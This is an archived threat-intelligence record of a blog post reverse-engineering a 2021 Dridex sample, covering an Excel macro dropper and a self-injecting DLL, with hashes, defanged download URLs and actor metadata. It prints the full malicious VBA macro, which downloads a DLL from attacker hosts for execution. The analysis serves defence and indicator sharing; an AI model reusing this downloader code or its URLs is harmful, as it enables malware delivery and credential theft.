{ "id": "56d00767-d3d1-4716-b075-e7d78174ed0d", "created_at": "2026-04-06T00:14:44.733949Z", "updated_at": "2026-04-10T03:31:09.742564Z", "deleted_at": null, "sha1_hash": "c68b53b73a4705604a92898971f4f51fe6048c5c", "title": "Dridex Malware Analysis [1 Feb 2021]", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3917551, "plain_text": "Dridex Malware Analysis [1 Feb 2021]\r\nPublished: 2021-02-07 · Archived: 2026-04-05 23:42:08 UTC\r\nDridex “also know as Bugat and Cridex” is a form of malware banking trojan and infostealer that operated by criminal\r\ngroup referred to as “Indrik Spider”. Dridex specializes in stealing banking credentials via systems that utilizes macros from\r\nMicrosoft office products like Word and Excel. In previous recoded incident the threat actors have used Dridex to hit high\r\nvalue targets with ransomware [2].\r\nIn this post, presenting reverse engineering malware of the recent Dridex sample that has been found in the wild earlier this\r\nFebruary. The analysis highlights the techniques and codes used by the threat actor; and the method used to analyze this\r\nsample and extract hidden IOC and files that has not been detected by sandbox. Note that multiple labs got different artifacts\r\nand indicators so this work is almost a contribution to others security labs and researchers. This malware has two stages, the\r\nfirst one is an Excel file that has embedded VBA macro which infect the system with a DLL file that runs as a process in the\r\nsecond stage.\r\nFile Name SHA265\r\nFile\r\nSize\r\nprintouts_of_outstanding_as_of\r\nFEB_01_2021.xlsm\r\nb721618810b06ed4089d1469fc5c5b37be1a907fc1ae14222f913c6e2b0001c2\r\n115.81\r\nKB\r\nlibeay32.dll 26a659ec56c7bd7b83a2f968626c1524bda829e0fefff37ecf4c4fb55ad158e3\r\n570.00\r\nKB\r\n[Table 1] Samples Basic Properties, Ref: Any.Run [3] [4]\r\n1. Excel File with Locked Macro\r\nAs what appear to look like an invoice delivered via email at the first day of the month is a malicious spreadsheet. The\r\nXLSM extension is indication that M stands for Macro and the code only runs when macro feature is activated and clicking\r\non the sheet! What looks like cell with number are just images linked to the macro.\r\n[Figure 1]\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 1 of 16\n\nThere’re three hidden sheets and locked macro! Apparently locked doesn’t mean password protected, it means locked! And\r\ncan’t be extracted and reused in new excel for this case in particular.\r\n[Figure 2]\r\nTo debug this sample require two steps:\r\nFirst: extract the sample and locate the malicious file that has the macro using oledump.py. Identifying the macro is located\r\nat the fifth stream which is a VBA code.\r\n[Figure 3] Oledump On Linux machine\r\nBelow is the extracted code\r\n#If VBA7 And Win64 Then\r\n Private Declare PtrSafe Function yellow_pages Lib \"urlmon\" _\r\n Alias \"URLDownloadToFileA\" ( _\r\n ByVal pCaller As LongPtr, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As LongPtr, _\r\n ByVal lpfnCB As LongPtr _\r\n ) As Long\r\n#Else\r\n Private Declare Function yellow_pages Lib \"urlmon\" _\r\n Alias \"URLDownloadToFileA\" ( _\r\n ByVal pCaller As Long, _\r\n ByVal szURL As String, _\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 2 of 16\n\nByVal szFileName As String, _\r\n ByVal dwReserved As Long, _\r\n ByVal lpfnCB As Long _\r\n ) As Long\r\n#End If\r\nFunction last_counter_a(nimo As Variant) As String\r\nRandomize: df = 2 - 1: last_counter_a = nimo(Int((UBound(nimo) + df) * Rnd))\r\nEnd Function\r\nSub Prv_invoice()\r\nRoLo = Split(RTrim(first_prepayment), progress_bars(\")\"))\r\nSheets(1).Cells(3, 1).Name = \"ForA_\" \u0026 \"s\"\r\nstorages = Split(RoLo(1), progress_bars(\"+\"))\r\nFor A = 0 To UBound(storages) - LBound(storages) + 1\r\nOn Error Resume Next\r\nSheets(1).Cells(3, 1).Value = \"=\" \u0026 storages(A)\r\nRun (\"ForA_\" \u0026 \"s\")\r\nIf A = 12 Then A_min_1 = re_order:\r\nIf A = 14 Then\r\nvega = re_order\r\nyellow_pages 0, date_to_date(last_counter_a(Split(RoLo(0), progress_bars(\"D\")))), A_min_1 \u0026 \"\\\" \u0026 vega, 0, 0\r\nEnd If\r\nNext\r\nEnd Sub\r\nFunction re_order()\r\nre_order = Sheets(1).Range(\"B1:B5\").SpecialCells(xlCellTypeConstants)\r\nEnd Function\r\nPublic Function date_to_date(rr As String)\r\ndate_to_date = Right(rr, Len(rr) - 1)\r\nEnd Function\r\nFunction first_prepayment()\r\nDim cooperation As String\r\nDim rest_che As String: Dim value_cargos As String\r\nDim u As Integer: cooperation = accouintis(4)\r\nrest_che = accouintis(3): value_cargos = accouintis(2)\r\nFor u = 1 To Len(cooperation)\r\nrezzzult = rezzzult \u0026 book_rebook(cooperation, u) \u0026 book_rebook(rest_che, u) \u0026 book_rebook(value_cargos, u)\r\nNext\r\nfirst_prepayment = RTrim(rezzzult)\r\nEnd Function\r\nFunction accouintis(d As Integer)\r\nFor Each ds In Sheets(d).UsedRange.SpecialCells(xlCellTypeConstants): forTwo = forTwo \u0026 ds: accouintis = forTwo\r\nNext\r\nEnd Function\r\nFunction progress_bars(df As String)\r\nprogress_bars = Replace(String(4, \"Z\"), \"Z\", df)\r\nEnd Function\r\nFunction book_rebook(y As String, k As Integer)\r\nbook_rebook = Mid(y, k, 1)\r\nEnd Function\r\nSecond: Unlock the document by using EvilClippy tool which removes the malicious macro. Open the new version and\r\ncreate new macro and paste the above VBA code. Previous incidents involve Dridex also notice the use of EvilClippy use\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 3 of 16\n\n[Figure 4] Unlocking the xlsm file\r\nBefore debugging the code, the main sheet and the three hidden ones got some characters white colored spread among cells\r\nby 7×7000 size. After a bit of cleaning they appear be random, but not encoded. Below are the sheet characters.\r\n[Figure 5] Random cells from Excel file\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 4 of 16\n\n[Figure 6] characters extracted and cleaned from three sheets\r\nSheet1\r\ndt:lsawoqnczDDts/amki.thhm.rDhp/asrotnsezv2zDDts/kaacrohw.pDhp/ia.inbnitaidliiD1t:ruehoj0izDDts/slntnthoqoh.rDhp/wkxec/c06\r\n===========================================================================\r\nSheet 2\r\nhp/esd.m221iDlt:sraense5bkrDDts/khelisi/u6uiDst:shlmh.mvmzDDts/brahtastecnc8.pDhp/cta.m3zniDjt:aaa.zfe.mvxzrDDts/wnfdomjn.\r\n================================================================================================\r\nSheet 3\r\nts/nhoc/5y.pDhp/hkrtgi/vbxaDtt:leosuo.tvqc.pDhp/iwsaac/pwiD6t:lryramitu../bfzDDts/orcc/oh.pDhp/lqimiocc/eu8aD3t:w.oe.mry5z\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 5 of 16\n\nWhen debugging the code it appears to be those random characters spread on sheet cell start forming three arrays. When\r\nreading it top to bottom one character at the time it appears to be URLs. After complete running the code it generates over a\r\n100 URL, all the URLs are in Appendix – A\r\n[Figure 7] Debugging VBA code\r\nAfter re-debugging multiple times there appears to be two random IOCs generate. A URL to connect download site and the\r\nDLL file name. What’s interesting is that some! Of the generated URLs are not from the list in Appendix -A and that is\r\nwhat Dridex is all about. Below is three samples of random generated IOCs. Further IOC are found in VT.\r\n[Figure 8] Dropped DLL file\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 6 of 16\n\n[Figure 9] Date-to-Date function selected URL\r\nFinally, the end of this stage is creating a process that use Regsvr23.exe to run the create DLL. The third hidden sheet\r\ncontains the end/exit function of the VBA. There’s temporary file generated in the %TEMP% folder has a cache version of\r\nthe macro. Other network and host-based IOCs are found on VT.\r\n[Figure 10]\r\nFile Name SHA265\r\n~DFDC192FF5186970D5.TMP 77AA147FC137EBB5FA8865DAE56ABC21A66E87B8454125666A6F80F589A0005C\r\n[Table 2] Temporary File Created\r\n2. DLL File with Self-Injection\r\nUp the time writing this post 13/69 of VT engines has detected this file as malicious\r\n[Figure 11] VT\r\nThis binary never been seen before the incident and the compiled time from 2009. Other than that there are couple of\r\nindicators this file is suspicious like the file size compared to strings, imported and exported sections, and resources section\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 7 of 16\n\n[Figure 12] PeStudio view of the original DLL file\r\n[Figure 13]\r\nWhen running this binary on IDA it seem to be too much gray and less code and resources. The binary isn’t detected to be\r\npacked in Detect it Easy or PEiD, but there’s high Entropy.\r\n[Figure 14] IDA\r\nAfter few rounds on x32dbg it appears to be this binary is using DLL self-injection technique. To put simply there is a\r\nhidden code that overwrite the original PE file with new file during runtime. This technique requires to allocate memory\r\nspace to the hidden code first then extract it the code in the region of the memory. The overwritten happens on memory\r\nduring runtime and to make it happen it requires two setting two breakpoint (VirtualProtect and VirtualAlloc). Once hitting\r\ncertain space memory it’s possible to extract.\r\nAfter few runs and reaching the EntryPoint on x32dbg and being on the right module and setting, it is time to set the\r\nbreakpoint\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 8 of 16\n\n[Figure 15] EntryPoint of DLL file\r\n[Figure 16] BreakPoints\r\nAfter hitting Run (F9) few time you reach to a \u003cVirtualAlloc\u003e breakpoint which by checking the EAX register appears to\r\nfreed up some space\r\n[Figure 17] Reaching the breakpoint\r\nBefore running to the next breakpoint let’s make sure what has been allocated by putting breakpoint to return (ret) or just\r\nRun Until Return [Figure 18]. return from this function it appears to be some random data has filled up EAX [Figure 19].\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 9 of 16\n\n[Figure 18] Empty EAX Register\r\n[Figure 19] EAX Register After Return\r\nWhen Follow in Memory, it appears that memory space has Execute, Read, and Write which is a sign of hidden code to be\r\nexecuted in the next steps\r\n[Figure 20] Memory Map x32dbg\r\nAfter another Run [F9] and stop at a second \u003cVirtualAlloc\u003e breakpoint and free up space in memory and by checking EAX\r\ndumped value it appears to have nothing. The memory space of the new allocated is also with ERW privileges. It’s the same\r\nas the previous stop as the \u003cVirtualAlloc\u003e but this time different memory place and different gibberish values\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 10 of 16\n\n[Figure 21] Second VirtualAlloc Breakpoint\r\nThe next Run (F9) would be stop at \u003cVirtualProtect\u003e when dumping EAX register, there appears to be something close to\r\nMZ header! By checking the dump values there are some normal ASCII characters that resembles executable binary.\r\nReaching this point means the next Run (F9) will be overwriting the original PE (Libeay32.dll), in this case, with new file\r\n[Figure 22]\r\n[Figure 23] Packed Executable\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 11 of 16\n\nIt’s possible to dump memory location from x32dbg Memory Map, but choosing alternatives is sometimes better like using\r\nProcessHacker. When running ProcessHacker in Administrative mode \u003e selecting the running process inside x32dbg \u003e\r\nopen Properties \u003e Memory tap \u003e Locate the same memory (0x24f0000) “which is dynamic value different on each run” \u003e\r\nRight click and save\r\n[Figure 24] ProcessHacker Dumping memory\r\nWhen loading this dumped binary in PE-bear, it appears to not having any Imports. Which is normal because it’s been\r\ndumped from memory, but it requires fix get things right\r\n[Figure 25] PE-bear Imports section\r\nThe fix requires matching the ‘Raw Addresses’ to match ‘Virtual Addresses’ of this binary. When values matched the\r\nImports section is fixed and shows DLL values\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 12 of 16\n\n[Figure 26] PE-bear Fixing Raw Addresses\r\nCompared with [Figure 12] the new dumped file seems to be entirely different binary with new compile time by Sep 2020\r\nunlike the original PE which show compilation on 2009\r\n[Figure 27] Pestudio look of the new binary\r\n[Figure 28] Pestudio strings section\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 13 of 16\n\nFile Name SHA265\r\nFile\r\nSize\r\n24f0000_mem_dump-f.bin\r\n51C35BE1C816876C4325501641CD04CDDE0814C01DA4762F747B07A6366A6DBE 624KB\r\n[Table 3] Packed file\r\nAppendix – A\r\nDO NOT click at any URL\r\nhxxps://lensshadow[.]com/q25n2yc1[.]zip\r\nhxxps://sharkmarketing[.]site/h5vhbbmkx[.]rar\r\nhxxps://lakeshoresolutions[.]site/vzuqv6c2u[.]zip\r\nhxxps://sikhwalsamachar[.]com/hvpwmw[.]zip\r\nhxxps://library[.]arihantmbainstitute[.]ac[.]in/dcbl8fi[.]zip\r\nhxxps://rcoutreach[.]com/j3o0zhin[.]zip\r\nhxxps://alsaqlain[.]mtzinfotech[.]com/qveoxuhz8[.]rar\r\nhxxps://www[.]knoxfeed[.]com/mrcjy0n56[.]zip\r\nhxxps://www[.]msctahmedabad[.]com/ap7frbox[.]rar\r\nhxxps://compremaisaqui[.]com[.]br/hvsz2tddd[.]zip\r\nhxxps://greengluecompound[.]com/dtyhtl07[.]zip\r\nhxxps://utah[.]localcitycenter[.]com/vysme8[.]zip\r\nhxxps://marscereals[.]com/zkx0fhja1[.]rar\r\nhxxps://pinara[.]biz/ubtrfi[.]zip\r\nhxxps://shop[.]zoomangle[.]com/c3f7z1wc[.]zip\r\nhxxps://haifacollege[.]org[.]il/m00zz5i0[.]zip\r\nhxxps://allmobilezone[.]com/nrx7d41xr[.]rar\r\nhxxps://bullseyemedia[.]in/d8kya9v[.]zip\r\nhxxps://makedacare[.]com/gzx066[.]rar\r\nhxxps://m[.]localcitycenter[.]com/m41ntxsdi[.]rar\r\nhxxps://rklkpgcollege[.]com/q159te[.]rar\r\nhxxps://hesedorg[.]org/ghbxb7[.]zip\r\nhxxps://ngo[.]edusprit[.]com/e0ix7dxta[.]zip\r\nhxxps://gutech[.]com[.]sa/yo4fz9[.]zip\r\nhxxps://bcrg[.]co[.]za/tegx1a[.]rar\r\nhxxps://app[.]cutisclinics[.]com/gks0cu[.]rar\r\nhxxps://pulaski[.]website/rbv9d79[.]zip\r\nhxxps://daniel[.]idevs[.]site/pia5bsykl[.]zip\r\nhxxps://neumaservicios[.]com[.]ar/qf3wgtie7[.]rar\r\nhxxps://ssntrs[.]gm-computindo[.]com/mwo3b1[.]rar\r\nhxxps://huffingtontribune[.]com/talt7wf[.]zip\r\nhxxps://athenacapsg[.]com/vqwslkvgx[.]zip\r\nhxxps://www[.]mareterra[.]com[.]co/vyjjiu[.]zip\r\nhxxps://ilovedaybreak[.]com/z1rv2dy[.]rar\r\nhxxps://aromatherapy[.]a1oilindia[.]in/vtdeudnic[.]zip\r\nhxxps://netaqplus[.]com/xo0luusml[.]zip\r\nhxxps://web[.]thebeessolution[.]com/c0w5alb[.]zip\r\nhxxps://gc3m[.]info/n69ym3bk[.]zip\r\nhxxps://web[.]thebeessolution[.]com/c0w5alb[.]zip\r\nhxxps://srichaitanyacollegenlg[.]com/og3wncuv[.]zip\r\nhxxps://www[.]spittinfire[.]com/imrgqn59[.]rar\r\nhxxps://eltrendelossuenios[.]com[.]ar/ttblf99i[.]zip\r\nhxxps://uk[.]idevs[.]site/jn2yx3[.]zip\r\nhxxps://gaiapeaks[.]site/fyoja23[.]rar\r\nhxxps://jumaa[.]boldcreationsnam[.]com/okhq50[.]zip\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 14 of 16\n\nhxxps://wp[.]osmangony[.]info/xrmigx[.]zip\r\nhxxps://coriawp[.]elmamamobil[.]com/upj6o9k4c[.]zip\r\nhxxps://khabardarnews[.]in/ldnq5uz[.]zip\r\nhxxps://www[.]iam313[.]com/ojtyptcv[.]zip\r\nhxxps://mobicraftdev[.]mincraftquickskineditor[.]com/vt0l6q61[.]rar\r\nhxxps://herbalextracts[.]a1oilindia[.]in/i2kwwtp[.]zip\r\nhxxps://vegas[.]localcitycenter[.]com/uc5az9i[.]rar\r\nhxxps://egyuttkonnyebb[.]zolitoth[.]com/dm98dcw[.]rar\r\nhxxps://shekharsinstitutenalgonda[.]com/tjgua2[.]rar\r\nhxxps://content-engine[.]rankoneagency[.]com/wirh835i[.]rar\r\nhxxps://taksim[.]co[.]il/g9itqzo[.]rar\r\nhxxps://scholarship[.]osmangony[.]info/pzf3d4h[.]zip\r\nhxxps://kucianohotels[.]ng/eqztobqz[.]rar\r\nhxxps://digitalaxom[.]in/dsd159g72[.]rar\r\nhxxps://dspfoundation[.]com/os7kny3[.]zip\r\nhxxps://55[.]finaldatasolutions[.]com/snlkq6e[.]zip\r\nhxxps://madleneva[.]site/jl0qoqf3[.]rar\r\nhxxps://cadmuswebdesign[.]com/eqoczx[.]zip\r\nhxxps://tryathletelife[.]com/qwyne38m[.]rar\r\nhxxps://emosque[.]info/h7ftuq[.]zip\r\nhxxps://notif1[.]priruz[.]co[.]in/v4fn4tvg5[.]zip\r\nhxxps://sagittalimited[.]site/mzpxej[.]zip\r\nhxxps://cwbbox[.]com[.]br/eipp2c60[.]zip\r\nhxxps://bajacamping[.]elmamamobil[.]com/f63yt5[.]zip\r\nhxxps://lms[.]cstdevs[.]com/r3r1uqedb[.]zip\r\nhxxps://joelbonissilver[.]com/mq6cs9c5[.]zip\r\nhxxps://arjunmajumdar[.]com/i3dsc4[.]rar\r\nhxxps://truelyb[.]com/buiad8ek6[.]rar\r\nhxxps://mraudtee[.]peatus[.]net/y0g3jl5k9[.]zip\r\nhxxps://letspogoyork[.]com/l3vlz8zpf[.]rar\r\nhxxps://ffsurveyors[.]com[.]br/gd22wtgu[.]rar\r\nhxxps://bambootea[.]store/wdbyzv[.]zip\r\nhxxps://hacklady[.]com/p742vtdn[.]rar\r\nhxxps://sreenivasapaintingworks[.]com/pqbtf6[.]rar\r\nhxxps://qurbanakbarindonesia[.]com/tg8gadi[.]zip\r\nhxxps://quintadoabacate[.]com/k5f9m33e8[.]zip\r\nhxxps://leluibuffet[.]com[.]br/hl7esn[.]zip\r\nhxxps://todoapp[.]cstdevs[.]com/dgul98n5x[.]zip\r\nhxxps://salsahd[.]com/tvjysy[.]rar\r\nhxxps://pornonhd[.]com/ik3gp8oc[.]zip\r\nhxxps://alpha-chemistry[.]ir/ys7ur7jk[.]rar\r\nhxxps://edurecruit[.]idevs[.]site/ufkd03[.]zip\r\nhxxps://ecovillefashion[.]com/bysrypj[.]zip\r\nhxxps://tusharagarwal[.]online/zbw09n[.]rar\r\nhxxps://www[.]minuevavida[.]org/g2anr8[.]rar\r\nhxxps://ugateshop[.]com/w4s1pcd[.]zip\r\nhxxps://www[.]adamorinmusic[.]com/g33zak4[.]zip\r\nhxxps://info[.]deftenglish[.]com/r3yprhn1z[.]zip\r\nhxxps://meunikah[.]com/sny0k57qz[.]zip\r\nhxxps://womenwithamandate[.]com/wk920hw0[.]rar\r\nhxxps://cubc[.]elmamamobil[.]com/q8w20z[.]zip\r\nhxxps://jobs[.]thebeessolution[.]com/ifrljo2j0[.]zip\r\nhxxps://strengthrer[.]com/tdz9d1fjw[.]zip\r\nhxxps://agroshowtv[.]com/b5farl[.]rar\r\nhxxps://nicoleth[.]elmamamobil[.]com/mv1fup[.]zip\r\nhxxps://childderm[.]com/e2tpt3[.]rar\r\nhxxps://smithcalendar[.]cstdevs[.]com/qv9p5brpm[.]zip\r\nhxxps://jettaffiliates[.]site/bqluv10q[.]rar\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 15 of 16\n\nhxxps://bluesteelinfra[.]com/lc0pb00[.]zip\r\nhxxps://texturesbyvinita[.]com/dhzkiuf[.]rar\r\nhxxps://corporativosanluis[.]net/dpeaemem1[.]rar\r\nhxxps://wpcoder[.]io/rsbwunhso[.]zip\r\nhxxps://burbankautoglass[.]net/z9qe5rva2[.]rar\r\nhxxps://api[.]cstdevs[.]com/c4voo0gc[.]rar\r\nhxxps://coltdogracoes[.]com[.]br/d06f6y[.]rar\r\nhxxps://personal[.]personaltrainerfds[.]com/rhiwosfx[.]zip\r\nhxxps://adithimedia[.]com/hr9gbfn[.]zip\r\nhxxps://clickce[.]org/f7qdijx3[.]zip\r\nhxxps://talklivebuddy[.]com/myr00k[.]zip\r\nhxxps://ourvisionopticals[.]store/e6nwgxj8[.]zip\r\nhxxps://gory-store[.]com/wh05c3[.]rar\r\nhxxps://intships[.]com/fbeyyjr[.]zip\r\nhxxps://floralwaters[.]a1oilindia[.]in/psg2sfk[.]zip\r\nhxxps://app[.]prerana[.]info/j972z9[.]zip\r\nhxxps://bpacit[.]in/p3qaf6[.]rar\r\nhxxps://restauranttalksandstories[.]com/owutc3je[.]zip\r\nhxxps://mail[.]wepartnersfiles[.]com/mwu6lp9s[.]zip\r\nhxxps://palbas[.]cl/wm7qb5ph[.]rar\r\nhxxps://coria[.]elmamamobil[.]com/dx1dn4a[.]zip\r\nhxxps://visions[.]alnisamart[.]com/l1l0tal[.]zip\r\nhxxps://lakeshoresolutions[.]site/vzuqv6c2u[.]zip\r\nhxxps://ngo[.]edusprit[.]com/e0ix7dxta[.]zip\r\nhxxps://burbankautoglass[.]net/z9qe5rva2[.]rar\r\nhxxps://nicoleth[.]elmamamobil[.]com/mv1fup[.]zip\r\nhxxps://ngo[.]edusprit[.]com/e0ix7dxta[.]zip\r\nReferences\r\n[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider\r\n[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware,\r\nhttps://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/\r\n[3] Excel file sample, https://app.any.run/tasks/8e693e74-befe-4c01-ad8e-aed066254d5b/\r\n[4] DLL file sample, https://app.any.run/tasks/0a690f3a-3bfa-4490-9022-2057163ea5cc/\r\n[5] EvilClippy Github repository, https://github.com/outflanknl/EvilClippy\r\n[6] Excel File VT,\r\nhttps://www.virustotal.com/gui/file/b721618810b06ed4089d1469fc5c5b37be1a907fc1ae14222f913c6e2b0001c2/detection\r\n[7] DLL File VT,\r\nhttps://www.virustotal.com/gui/file/26a659ec56c7bd7b83a2f968626c1524bda829e0fefff37ecf4c4fb55ad158e3/detection\r\n[8] Ten process injection techniques: A technical survey of common and trending process injection techniques,\r\nhttps://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\r\nSource: https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nhttps://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/" ], "report_names": [ "dridex-malware-analysis" ], "threat_actors": [ { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "d706edf6-cb86-4611-99e1-4b464e9dc5b9", "created_at": "2023-01-06T13:46:38.839083Z", "updated_at": "2026-04-10T02:00:03.117987Z", "deleted_at": null, "main_name": "INDRIK SPIDER", "aliases": [ "Manatee Tempest" ], "source_name": "MISPGALAXY:INDRIK SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434484, "ts_updated_at": 1775791869, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c68b53b73a4705604a92898971f4f51fe6048c5c.pdf", "text": "https://archive.orkl.eu/c68b53b73a4705604a92898971f4f51fe6048c5c.txt", "img": "https://archive.orkl.eu/c68b53b73a4705604a92898971f4f51fe6048c5c.jpg" } }